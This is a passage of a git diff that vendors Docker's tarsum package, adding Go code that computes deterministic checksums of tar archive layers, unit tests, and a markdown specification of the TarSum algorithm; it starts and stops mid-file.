len(ts.GetSums()) - 1 + + ts.(BuilderContext).Remove("etc/sudoers") + + if len(ts.GetSums()) != expected { + t.Fatalf("Expected %v sums, go %v.", 
expected, len(ts.GetSums())) + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go new file mode 100644 index 0000000000..5abf5e7ba3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go @@ -0,0 +1,126 @@ +package tarsum + +import "sort" + +// FileInfoSumInterface provides an interface for accessing file checksum +// information within a tar file. This info is accessed through interface +// so the actual name and sum cannot be melded with. +type FileInfoSumInterface interface { + // File name + Name() string + // Checksum of this particular file and its headers + Sum() string + // Position of file in the tar + Pos() int64 +} + +type fileInfoSum struct { + name string + sum string + pos int64 +} + +func (fis fileInfoSum) Name() string { + return fis.name +} +func (fis fileInfoSum) Sum() string { + return fis.sum +} +func (fis fileInfoSum) Pos() int64 { + return fis.pos +} + +// FileInfoSums provides a list of FileInfoSumInterfaces. +type FileInfoSums []FileInfoSumInterface + +// GetFile returns the first FileInfoSumInterface with a matching name. +func (fis FileInfoSums) GetFile(name string) FileInfoSumInterface { + for i := range fis { + if fis[i].Name() == name { + return fis[i] + } + } + return nil +} + +// GetAllFile returns a FileInfoSums with all matching names. +func (fis FileInfoSums) GetAllFile(name string) FileInfoSums { + f := FileInfoSums{} + for i := range fis { + if fis[i].Name() == name { + f = append(f, fis[i]) + } + } + return f +} + +// GetDuplicatePaths returns a FileInfoSums with all duplicated paths. +func (fis FileInfoSums) GetDuplicatePaths() (dups FileInfoSums) { + seen := make(map[string]int, len(fis)) // allocate earl. no need to grow this map. 
+ for i := range fis { + f := fis[i] + if _, ok := seen[f.Name()]; ok { + dups = append(dups, f) + } else { + seen[f.Name()] = 0 + } + } + return dups +} + +// Len returns the size of the FileInfoSums. +func (fis FileInfoSums) Len() int { return len(fis) } + +// Swap swaps two FileInfoSum values if a FileInfoSums list. +func (fis FileInfoSums) Swap(i, j int) { fis[i], fis[j] = fis[j], fis[i] } + +// SortByPos sorts FileInfoSums content by position. +func (fis FileInfoSums) SortByPos() { + sort.Sort(byPos{fis}) +} + +// SortByNames sorts FileInfoSums content by name. +func (fis FileInfoSums) SortByNames() { + sort.Sort(byName{fis}) +} + +// SortBySums sorts FileInfoSums content by sums. +func (fis FileInfoSums) SortBySums() { + dups := fis.GetDuplicatePaths() + if len(dups) > 0 { + sort.Sort(bySum{fis, dups}) + } else { + sort.Sort(bySum{fis, nil}) + } +} + +// byName is a sort.Sort helper for sorting by file names. +// If names are the same, order them by their appearance in the tar archive +type byName struct{ FileInfoSums } + +func (bn byName) Less(i, j int) bool { + if bn.FileInfoSums[i].Name() == bn.FileInfoSums[j].Name() { + return bn.FileInfoSums[i].Pos() < bn.FileInfoSums[j].Pos() + } + return bn.FileInfoSums[i].Name() < bn.FileInfoSums[j].Name() +} + +// bySum is a sort.Sort helper for sorting by the sums of all the fileinfos in the tar archive +type bySum struct { + FileInfoSums + dups FileInfoSums +} + +func (bs bySum) Less(i, j int) bool { + if bs.dups != nil && bs.FileInfoSums[i].Name() == bs.FileInfoSums[j].Name() { + return bs.FileInfoSums[i].Pos() < bs.FileInfoSums[j].Pos() + } + return bs.FileInfoSums[i].Sum() < bs.FileInfoSums[j].Sum() +} + +// byPos is a sort.Sort helper for sorting by the sums of all the fileinfos by their original order +type byPos struct{ FileInfoSums } + +func (bp byPos) Less(i, j int) bool { + return bp.FileInfoSums[i].Pos() < bp.FileInfoSums[j].Pos() +} diff --git 
a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go new file mode 100644 index 0000000000..bb700d8bde --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go @@ -0,0 +1,62 @@ +package tarsum + +import "testing" + +func newFileInfoSums() FileInfoSums { + return FileInfoSums{ + fileInfoSum{name: "file3", sum: "2abcdef1234567890", pos: 2}, + fileInfoSum{name: "dup1", sum: "deadbeef1", pos: 5}, + fileInfoSum{name: "file1", sum: "0abcdef1234567890", pos: 0}, + fileInfoSum{name: "file4", sum: "3abcdef1234567890", pos: 3}, + fileInfoSum{name: "dup1", sum: "deadbeef0", pos: 4}, + fileInfoSum{name: "file2", sum: "1abcdef1234567890", pos: 1}, + } +} + +func TestSortFileInfoSums(t *testing.T) { + dups := newFileInfoSums().GetAllFile("dup1") + if len(dups) != 2 { + t.Errorf("expected length 2, got %d", len(dups)) + } + dups.SortByNames() + if dups[0].Pos() != 4 { + t.Errorf("sorted dups should be ordered by position. 
Expected 4, got %d", dups[0].Pos()) + } + + fis := newFileInfoSums() + expected := "0abcdef1234567890" + fis.SortBySums() + got := fis[0].Sum() + if got != expected { + t.Errorf("Expected %q, got %q", expected, got) + } + + fis = newFileInfoSums() + expected = "dup1" + fis.SortByNames() + gotFis := fis[0] + if gotFis.Name() != expected { + t.Errorf("Expected %q, got %q", expected, gotFis.Name()) + } + // since a duplicate is first, ensure it is ordered first by position too + if gotFis.Pos() != 4 { + t.Errorf("Expected %d, got %d", 4, gotFis.Pos()) + } + + fis = newFileInfoSums() + fis.SortByPos() + if fis[0].Pos() != 0 { + t.Errorf("sorted fileInfoSums by Pos should order them by position.") + } + + fis = newFileInfoSums() + expected = "deadbeef1" + gotFileInfoSum := fis.GetFile("dup1") + if gotFileInfoSum.Sum() != expected { + t.Errorf("Expected %q, got %q", expected, gotFileInfoSum) + } + if fis.GetFile("noPresent") != nil { + t.Errorf("Should have return nil if name not found.") + } + +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go new file mode 100644 index 0000000000..154788db82 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go @@ -0,0 +1,295 @@ +// Package tarsum provides algorithms to perform checksum calculation on +// filesystem layers. +// +// The transportation of filesystems, regarding Docker, is done with tar(1) +// archives. There are a variety of tar serialization formats [2], and a key +// concern here is ensuring a repeatable checksum given a set of inputs from a +// generic tar archive. Types of transportation include distribution to and from a +// registry endpoint, saving and loading through commands or Docker daemon APIs, +// transferring the build context from client to Docker daemon, and committing the +// filesystem of a container to become an image. 
+// +// As tar archives are used for transit, but not preserved in many situations, the +// focus of the algorithm is to ensure the integrity of the preserved filesystem, +// while maintaining a deterministic accountability. This includes neither +// constraining the ordering or manipulation of the files during the creation or +// unpacking of the archive, nor include additional metadata state about the file +// system attributes. +package tarsum + +import ( + "archive/tar" + "bytes" + "compress/gzip" + "crypto" + "crypto/sha256" + "encoding/hex" + "errors" + "fmt" + "hash" + "io" + "path" + "strings" +) + +const ( + buf8K = 8 * 1024 + buf16K = 16 * 1024 + buf32K = 32 * 1024 +) + +// NewTarSum creates a new interface for calculating a fixed time checksum of a +// tar archive. +// +// This is used for calculating checksums of layers of an image, in some cases +// including the byte payload of the image's json metadata as well, and for +// calculating the checksums for buildcache. +func NewTarSum(r io.Reader, dc bool, v Version) (TarSum, error) { + return NewTarSumHash(r, dc, v, DefaultTHash) +} + +// NewTarSumHash creates a new TarSum, providing a THash to use rather than +// the DefaultTHash. +func NewTarSumHash(r io.Reader, dc bool, v Version, tHash THash) (TarSum, error) { + headerSelector, err := getTarHeaderSelector(v) + if err != nil { + return nil, err + } + ts := &tarSum{Reader: r, DisableCompression: dc, tarSumVersion: v, headerSelector: headerSelector, tHash: tHash} + err = ts.initTarSum() + return ts, err +} + +// NewTarSumForLabel creates a new TarSum using the provided TarSum version+hash label. 
+func NewTarSumForLabel(r io.Reader, disableCompression bool, label string) (TarSum, error) { + parts := strings.SplitN(label, "+", 2) + if len(parts) != 2 { + return nil, errors.New("tarsum label string should be of the form: {tarsum_version}+{hash_name}") + } + + versionName, hashName := parts[0], parts[1] + + version, ok := tarSumVersionsByName[versionName] + if !ok { + return nil, fmt.Errorf("unknown TarSum version name: %q", versionName) + } + + hashConfig, ok := standardHashConfigs[hashName] + if !ok { + return nil, fmt.Errorf("unknown TarSum hash name: %q", hashName) + } + + tHash := NewTHash(hashConfig.name, hashConfig.hash.New) + + return NewTarSumHash(r, disableCompression, version, tHash) +} + +// TarSum is the generic interface for calculating fixed time +// checksums of a tar archive. +type TarSum interface { + io.Reader + GetSums() FileInfoSums + Sum([]byte) string + Version() Version + Hash() THash +} + +// tarSum struct is the structure for a Version0 checksum calculation. +type tarSum struct { + io.Reader + tarR *tar.Reader + tarW *tar.Writer + writer writeCloseFlusher + bufTar *bytes.Buffer + bufWriter *bytes.Buffer + bufData []byte + h hash.Hash + tHash THash + sums FileInfoSums + fileCounter int64 + currentFile string + finished bool + first bool + DisableCompression bool // false by default. When false, the output gzip compressed. + tarSumVersion Version // this field is not exported so it can not be mutated during use + headerSelector tarHeaderSelector // handles selecting and ordering headers for files in the archive +} + +func (ts tarSum) Hash() THash { + return ts.tHash +} + +func (ts tarSum) Version() Version { + return ts.tarSumVersion +} + +// THash provides a hash.Hash type generator and its name. +type THash interface { + Hash() hash.Hash + Name() string +} + +// NewTHash is a convenience method for creating a THash. 
+func NewTHash(name string, h func() hash.Hash) THash { + return simpleTHash{n: name, h: h} +} + +type tHashConfig struct { + name string + hash crypto.Hash +} + +var ( + // NOTE: DO NOT include MD5 or SHA1, which are considered insecure. + standardHashConfigs = map[string]tHashConfig{ + "sha256": {name: "sha256", hash: crypto.SHA256}, + "sha512": {name: "sha512", hash: crypto.SHA512}, + } +) + +// DefaultTHash is default TarSum hashing algorithm - "sha256". +var DefaultTHash = NewTHash("sha256", sha256.New) + +type simpleTHash struct { + n string + h func() hash.Hash +} + +func (sth simpleTHash) Name() string { return sth.n } +func (sth simpleTHash) Hash() hash.Hash { return sth.h() } + +func (ts *tarSum) encodeHeader(h *tar.Header) error { + for _, elem := range ts.headerSelector.selectHeaders(h) { + if _, err := ts.h.Write([]byte(elem[0] + elem[1])); err != nil { + return err + } + } + return nil +} + +func (ts *tarSum) initTarSum() error { + ts.bufTar = bytes.NewBuffer([]byte{}) + ts.bufWriter = bytes.NewBuffer([]byte{}) + ts.tarR = tar.NewReader(ts.Reader) + ts.tarW = tar.NewWriter(ts.bufTar) + if !ts.DisableCompression { + ts.writer = gzip.NewWriter(ts.bufWriter) + } else { + ts.writer = &nopCloseFlusher{Writer: ts.bufWriter} + } + if ts.tHash == nil { + ts.tHash = DefaultTHash + } + ts.h = ts.tHash.Hash() + ts.h.Reset() + ts.first = true + ts.sums = FileInfoSums{} + return nil +} + +func (ts *tarSum) Read(buf []byte) (int, error) { + if ts.finished { + return ts.bufWriter.Read(buf) + } + if len(ts.bufData) < len(buf) { + switch { + case len(buf) <= buf8K: + ts.bufData = make([]byte, buf8K) + case len(buf) <= buf16K: + ts.bufData = make([]byte, buf16K) + case len(buf) <= buf32K: + ts.bufData = make([]byte, buf32K) + default: + ts.bufData = make([]byte, len(buf)) + } + } + buf2 := ts.bufData[:len(buf)] + + n, err := ts.tarR.Read(buf2) + if err != nil { + if err == io.EOF { + if _, err := ts.h.Write(buf2[:n]); err != nil { + return 0, err + } + if !ts.first { + 
ts.sums = append(ts.sums, fileInfoSum{name: ts.currentFile, sum: hex.EncodeToString(ts.h.Sum(nil)), pos: ts.fileCounter}) + ts.fileCounter++ + ts.h.Reset() + } else { + ts.first = false + } + + currentHeader, err := ts.tarR.Next() + if err != nil { + if err == io.EOF { + if err := ts.tarW.Close(); err != nil { + return 0, err + } + if _, err := io.Copy(ts.writer, ts.bufTar); err != nil { + return 0, err + } + if err := ts.writer.Close(); err != nil { + return 0, err + } + ts.finished = true + return n, nil + } + return n, err + } + ts.currentFile = path.Clean(currentHeader.Name) + if err := ts.encodeHeader(currentHeader); err != nil { + return 0, err + } + if err := ts.tarW.WriteHeader(currentHeader); err != nil { + return 0, err + } + if _, err := ts.tarW.Write(buf2[:n]); err != nil { + return 0, err + } + ts.tarW.Flush() + if _, err := io.Copy(ts.writer, ts.bufTar); err != nil { + return 0, err + } + ts.writer.Flush() + + return ts.bufWriter.Read(buf) + } + return n, err + } + + // Filling the hash buffer + if _, err = ts.h.Write(buf2[:n]); err != nil { + return 0, err + } + + // Filling the tar writer + if _, err = ts.tarW.Write(buf2[:n]); err != nil { + return 0, err + } + ts.tarW.Flush() + + // Filling the output writer + if _, err = io.Copy(ts.writer, ts.bufTar); err != nil { + return 0, err + } + ts.writer.Flush() + + return ts.bufWriter.Read(buf) +} + +func (ts *tarSum) Sum(extra []byte) string { + ts.sums.SortBySums() + h := ts.tHash.Hash() + if extra != nil { + h.Write(extra) + } + for _, fis := range ts.sums { + h.Write([]byte(fis.Sum())) + } + checksum := ts.Version().String() + "+" + ts.tHash.Name() + ":" + hex.EncodeToString(h.Sum(nil)) + return checksum +} + +func (ts *tarSum) GetSums() FileInfoSums { + return ts.sums +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md new file mode 100644 index 0000000000..89b2e49f98 --- /dev/null +++ 
b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md @@ -0,0 +1,230 @@ +page_title: TarSum checksum specification +page_description: Documentation for algorithms used in the TarSum checksum calculation +page_keywords: docker, checksum, validation, tarsum + +# TarSum Checksum Specification + +## Abstract + +This document describes the algorithms used in performing the TarSum checksum +calculation on filesystem layers, the need for this method over existing +methods, and the versioning of this calculation. + +## Warning + +This checksum algorithm is for best-effort comparison of file trees with fuzzy logic. + +This is _not_ a cryptographic attestation, and should not be considered secure. + +## Introduction + +The transportation of filesystems, regarding Docker, is done with tar(1) +archives. There are a variety of tar serialization formats [2], and a key +concern here is ensuring a repeatable checksum given a set of inputs from a +generic tar archive. Types of transportation include distribution to and from a +registry endpoint, saving and loading through commands or Docker daemon APIs, +transferring the build context from client to Docker daemon, and committing the +filesystem of a container to become an image. + +As tar archives are used for transit, but not preserved in many situations, the +focus of the algorithm is to ensure the integrity of the preserved filesystem, +while maintaining a deterministic accountability. This includes neither +constraining the ordering or manipulation of the files during the creation or +unpacking of the archive, nor include additional metadata state about the file +system attributes. + +## Intended Audience + +This document is outlining the methods used for consistent checksum calculation +for filesystems transported via tar archives. + +Auditing these methodologies is an open and iterative process. This document +should accommodate the review of source code. 
Ultimately, this document should +be the starting point of further refinements to the algorithm and its future +versions. + +## Concept + +The checksum mechanism must ensure the integrity and assurance of the +filesystem payload. + +## Checksum Algorithm Profile + +A checksum mechanism must define the following operations and attributes: + +* Associated hashing cipher - used to checksum each file payload and attribute + information. +* Checksum list - each file of the filesystem archive has its checksum + calculated from the payload and attributes of the file. The final checksum is + calculated from this list, with specific ordering. +* Version - as the algorithm adapts to requirements, there are behaviors of the + algorithm to manage by versioning. +* Archive being calculated - the tar archive having its checksum calculated + +## Elements of TarSum checksum + +The calculated sum output is a text string. The elements included in the output +of the calculated sum comprise the information needed for validation of the sum +(TarSum version and hashing cipher used) and the expected checksum in hexadecimal +form. + +There are two delimiters used: +* '+' separates TarSum version from hashing cipher +* ':' separates calculation mechanics from expected hash + +Example: + +``` + "tarsum.v1+sha256:220a60ecd4a3c32c282622a625a54db9ba0ff55b5ba9c29c7064a2bc358b6a3e" + | | \ | + | | \ | + |_version_|_cipher__|__ | + | \ | + |_calculation_mechanics_|______________________expected_sum_______________________| +``` + +## Versioning + +Versioning was introduced [0] to accommodate differences in calculation needed, +and ability to maintain reverse compatibility. + +The general algorithm will be describe further in the 'Calculation'. + +### Version0 + +This is the initial version of TarSum. + +Its element in the TarSum checksum string is `tarsum`. + +### Version1 + +Its element in the TarSum checksum is `tarsum.v1`. 
+ +The notable changes in this version: +* Exclusion of file `mtime` from the file information headers, in each file + checksum calculation +* Inclusion of extended attributes (`xattrs`. Also seen as `SCHILY.xattr.` prefixed Pax + tar file info headers) keys and values in each file checksum calculation + +### VersionDev + +*Do not use unless validating refinements to the checksum algorithm* + +Its element in the TarSum checksum is `tarsum.dev`. + +This is a floating place holder for a next version and grounds for testing +changes. The methods used for calculation are subject to change without notice, +and this version is for testing and not for production use. + +## Ciphers + +The official default and standard hashing cipher used in the calculation mechanic +is `sha256`. This refers to SHA256 hash algorithm as defined in FIPS 180-4. + +Though the TarSum algorithm itself is not exclusively bound to the single +hashing cipher `sha256`, support for alternate hashing ciphers was later added +[1]. Use cases for alternate cipher could include future-proofing TarSum +checksum format and using faster cipher hashes for tar filesystem checksums. + +## Calculation + +### Requirement + +As mentioned earlier, the calculation is such that it takes into consideration +the lifecycle of the tar archive. In that the tar archive is not an immutable, +permanent artifact. Otherwise options like relying on a known hashing cipher +checksum of the archive itself would be reliable enough. The tar archive of the +filesystem is used as a transportation medium for Docker images, and the +archive is discarded once its contents are extracted. Therefore, for consistent +validation items such as order of files in the tar archive and time stamps are +subject to change once an image is received. + +### Process + +The method is typically iterative due to reading tar info headers from the +archive stream, though this is not a strict requirement. 
+ +#### Files + +Each file in the tar archive have their contents (headers and body) checksummed +individually using the designated associated hashing cipher. The ordered +headers of the file are written to the checksum calculation first, and then the +payload of the file body. + +The resulting checksum of the file is appended to the list of file sums. The +sum is encoded as a string of the hexadecimal digest. Additionally, the file +name and position in the archive is kept as reference for special ordering. + +#### Headers + +The following headers are read, in this +order ( and the corresponding representation of its value): +* 'name' - string +* 'mode' - string of the base10 integer +* 'uid' - string of the integer +* 'gid' - string of the integer +* 'size' - string of the integer +* 'mtime' (_Version0 only_) - string of integer of the seconds since 1970-01-01 00:00:00 UTC +* 'typeflag' - string of the char +* 'linkname' - string +* 'uname' - string +* 'gname' - string +* 'devmajor' - string of the integer +* 'devminor' - string of the integer + +For >= Version1, the extended attribute headers ("SCHILY.xattr." prefixed pax +headers) included after the above list. These xattrs key/values are first +sorted by the keys. + +#### Header Format + +The ordered headers are written to the hash in the format of + + "{.key}{.value}" + +with no newline. + +#### Body + +After the order headers of the file have been added to the checksum for the +file, the body of the file is written to the hash. + +#### List of file sums + +The list of file sums is sorted by the string of the hexadecimal digest. + +If there are two files in the tar with matching paths, the order of occurrence +for that path is reflected for the sums of the corresponding file header and +body. + +#### Final Checksum + +Begin with a fresh or initial state of the associated hash cipher. If there is +additional payload to include in the TarSum calculation for the archive, it is +written first. 
Then each checksum from the ordered list of file sums is written +to the hash. + +The resulting digest is formatted per the Elements of TarSum checksum, +including the TarSum version, the associated hash cipher and the hexadecimal +encoded checksum digest. + +## Security Considerations + +The initial version of TarSum has undergone one update that could invalidate +handcrafted tar archives. The tar archive format supports appending of files +with same names as prior files in the archive. The latter file will clobber the +prior file of the same path. Due to this the algorithm now accounts for files +with matching paths, and orders the list of file sums accordingly [3]. + +## Footnotes + +* [0] Versioning https://github.com/docker/docker/commit/747f89cd327db9d50251b17797c4d825162226d0 +* [1] Alternate ciphers https://github.com/docker/docker/commit/4e9925d780665149b8bc940d5ba242ada1973c4e +* [2] Tar http://en.wikipedia.org/wiki/Tar_%28computing%29 +* [3] Name collision https://github.com/docker/docker/commit/c5e6362c53cbbc09ddbabd5a7323e04438b57d31 + +## Acknowledgments + +Joffrey F (shin-) and Guillaume J. Charmes (creack) on the initial work of the +TarSum calculation. 
+ diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go new file mode 100644 index 0000000000..86df0e2b89 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go @@ -0,0 +1,664 @@ +package tarsum + +import ( + "archive/tar" + "bytes" + "compress/gzip" + "crypto/md5" + "crypto/rand" + "crypto/sha1" + "crypto/sha256" + "crypto/sha512" + "encoding/hex" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + "testing" +) + +type testLayer struct { + filename string + options *sizedOptions + jsonfile string + gzip bool + tarsum string + version Version + hash THash +} + +var testLayers = []testLayer{ + { + filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar", + jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json", + version: Version0, + tarsum: "tarsum+sha256:4095cc12fa5fdb1ab2760377e1cd0c4ecdd3e61b4f9b82319d96fcea6c9a41c6"}, + { + filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar", + jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json", + version: VersionDev, + tarsum: "tarsum.dev+sha256:db56e35eec6ce65ba1588c20ba6b1ea23743b59e81fb6b7f358ccbde5580345c"}, + { + filename: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar", + jsonfile: "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json", + gzip: true, + tarsum: "tarsum+sha256:4095cc12fa5fdb1ab2760377e1cd0c4ecdd3e61b4f9b82319d96fcea6c9a41c6"}, + { + // Tests existing version of TarSum when xattrs are present + filename: "testdata/xattr/layer.tar", + jsonfile: "testdata/xattr/json", + version: Version0, + tarsum: "tarsum+sha256:07e304a8dbcb215b37649fde1a699f8aeea47e60815707f1cdf4d55d25ff6ab4"}, + { + // Tests next version of TarSum when xattrs are present + filename: "testdata/xattr/layer.tar", + jsonfile: 
"testdata/xattr/json", + version: VersionDev, + tarsum: "tarsum.dev+sha256:6c58917892d77b3b357b0f9ad1e28e1f4ae4de3a8006bd3beb8beda214d8fd16"}, + { + filename: "testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar", + jsonfile: "testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json", + tarsum: "tarsum+sha256:c66bd5ec9f87b8f4c6135ca37684618f486a3dd1d113b138d0a177bfa39c2571"}, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha256:8bf12d7e67c51ee2e8306cba569398b1b9f419969521a12ffb9d8875e8836738"}, + { + // this tar has two files with the same path + filename: "testdata/collision/collision-0.tar", + tarsum: "tarsum+sha256:08653904a68d3ab5c59e65ef58c49c1581caa3c34744f8d354b3f575ea04424a"}, + { + // this tar has the same two files (with the same path), but reversed order. ensuring is has different hash than above + filename: "testdata/collision/collision-1.tar", + tarsum: "tarsum+sha256:b51c13fbefe158b5ce420d2b930eef54c5cd55c50a2ee4abdddea8fa9f081e0d"}, + { + // this tar has newer of collider-0.tar, ensuring is has different hash + filename: "testdata/collision/collision-2.tar", + tarsum: "tarsum+sha256:381547080919bb82691e995508ae20ed33ce0f6948d41cafbeb70ce20c73ee8e"}, + { + // this tar has newer of collider-1.tar, ensuring is has different hash + filename: "testdata/collision/collision-3.tar", + tarsum: "tarsum+sha256:f886e431c08143164a676805205979cd8fa535dfcef714db5515650eea5a7c0f"}, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+md5:0d7529ec7a8360155b48134b8e599f53", + hash: md5THash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha1:f1fee39c5925807ff75ef1925e7a23be444ba4df", + hash: sha1Hash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: 
"tarsum+sha224:6319390c0b061d639085d8748b14cd55f697cf9313805218b21cf61c", + hash: sha224Hash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha384:a578ce3ce29a2ae03b8ed7c26f47d0f75b4fc849557c62454be4b5ffd66ba021e713b48ce71e947b43aab57afd5a7636", + hash: sha384Hash, + }, + { + options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory) + tarsum: "tarsum+sha512:e9bfb90ca5a4dfc93c46ee061a5cf9837de6d2fdf82544d6460d3147290aecfabf7b5e415b9b6e72db9b8941f149d5d69fb17a394cbfaf2eac523bd9eae21855", + hash: sha512Hash, + }, +} + +type sizedOptions struct { + num int64 + size int64 + isRand bool + realFile bool +} + +// make a tar: +// * num is the number of files the tar should have +// * size is the bytes per file +// * isRand is whether the contents of the files should be a random chunk (otherwise it's all zeros) +// * realFile will write to a TempFile, instead of an in memory buffer +func sizedTar(opts sizedOptions) io.Reader { + var ( + fh io.ReadWriter + err error + ) + if opts.realFile { + fh, err = ioutil.TempFile("", "tarsum") + if err != nil { + return nil + } + } else { + fh = bytes.NewBuffer([]byte{}) + } + tarW := tar.NewWriter(fh) + defer tarW.Close() + for i := int64(0); i < opts.num; i++ { + err := tarW.WriteHeader(&tar.Header{ + Name: fmt.Sprintf("/testdata%d", i), + Mode: 0755, + Uid: 0, + Gid: 0, + Size: opts.size, + }) + if err != nil { + return nil + } + var rBuf []byte + if opts.isRand { + rBuf = make([]byte, 8) + _, err = rand.Read(rBuf) + if err != nil { + return nil + } + } else { + rBuf = []byte{0, 0, 0, 0, 0, 0, 0, 0} + } + + for i := int64(0); i < opts.size/int64(8); i++ { + tarW.Write(rBuf) + } + } + return fh +} + +func emptyTarSum(gzip bool) (TarSum, error) { + reader, writer := io.Pipe() + tarWriter := tar.NewWriter(writer) + + // Immediately close tarWriter and write-end of the + // Pipe in a separate goroutine so we don't block. 
+ go func() { + tarWriter.Close() + writer.Close() + }() + + return NewTarSum(reader, !gzip, Version0) +} + +// Test errors on NewTarsumForLabel +func TestNewTarSumForLabelInvalid(t *testing.T) { + reader := strings.NewReader("") + + if _, err := NewTarSumForLabel(reader, true, "invalidlabel"); err == nil { + t.Fatalf("Expected an error, got nothing.") + } + + if _, err := NewTarSumForLabel(reader, true, "invalid+sha256"); err == nil { + t.Fatalf("Expected an error, got nothing.") + } + if _, err := NewTarSumForLabel(reader, true, "tarsum.v1+invalid"); err == nil { + t.Fatalf("Expected an error, got nothing.") + } +} + +func TestNewTarSumForLabel(t *testing.T) { + + layer := testLayers[0] + + reader, err := os.Open(layer.filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + label := strings.Split(layer.tarsum, ":")[0] + ts, err := NewTarSumForLabel(reader, false, label) + if err != nil { + t.Fatal(err) + } + + // Make sure it actually worked by reading a little bit of it + nbByteToRead := 8 * 1024 + dBuf := make([]byte, nbByteToRead) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read %vKB from %s: %s", nbByteToRead, layer.filename, err) + } +} + +// TestEmptyTar tests that tarsum does not fail to read an empty tar +// and correctly returns the hex digest of an empty hash. +func TestEmptyTar(t *testing.T) { + // Test without gzip. + ts, err := emptyTarSum(false) + if err != nil { + t.Fatal(err) + } + + zeroBlock := make([]byte, 1024) + buf := new(bytes.Buffer) + + n, err := io.Copy(buf, ts) + if err != nil { + t.Fatal(err) + } + + if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), zeroBlock) { + t.Fatalf("tarSum did not write the correct number of zeroed bytes: %d", n) + } + + expectedSum := ts.Version().String() + "+sha256:" + hex.EncodeToString(sha256.New().Sum(nil)) + resultSum := ts.Sum(nil) + + if resultSum != expectedSum { + t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) + } + + // Test with gzip. 
+ ts, err = emptyTarSum(true) + if err != nil { + t.Fatal(err) + } + buf.Reset() + + n, err = io.Copy(buf, ts) + if err != nil { + t.Fatal(err) + } + + bufgz := new(bytes.Buffer) + gz := gzip.NewWriter(bufgz) + n, err = io.Copy(gz, bytes.NewBuffer(zeroBlock)) + gz.Close() + gzBytes := bufgz.Bytes() + + if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), gzBytes) { + t.Fatalf("tarSum did not write the correct number of gzipped-zeroed bytes: %d", n) + } + + resultSum = ts.Sum(nil) + + if resultSum != expectedSum { + t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) + } + + // Test without ever actually writing anything. + if ts, err = NewTarSum(bytes.NewReader([]byte{}), true, Version0); err != nil { + t.Fatal(err) + } + + resultSum = ts.Sum(nil) + + if resultSum != expectedSum { + t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum) + } +} + +var ( + md5THash = NewTHash("md5", md5.New) + sha1Hash = NewTHash("sha1", sha1.New) + sha224Hash = NewTHash("sha224", sha256.New224) + sha384Hash = NewTHash("sha384", sha512.New384) + sha512Hash = NewTHash("sha512", sha512.New) +) + +// Test all the build-in read size : buf8K, buf16K, buf32K and more +func TestTarSumsReadSize(t *testing.T) { + // Test always on the same layer (that is big enough) + layer := testLayers[0] + + for i := 0; i < 5; i++ { + + reader, err := os.Open(layer.filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + ts, err := NewTarSum(reader, false, layer.version) + if err != nil { + t.Fatal(err) + } + + // Read and discard bytes so that it populates sums + nbByteToRead := (i + 1) * 8 * 1024 + dBuf := make([]byte, nbByteToRead) + _, err = ts.Read(dBuf) + if err != nil { + t.Errorf("failed to read %vKB from %s: %s", nbByteToRead, layer.filename, err) + continue + } + } +} + +func TestTarSums(t *testing.T) { + for _, layer := range testLayers { + var ( + fh io.Reader + err error + ) + if len(layer.filename) > 0 { + fh, err = os.Open(layer.filename) + if err != 
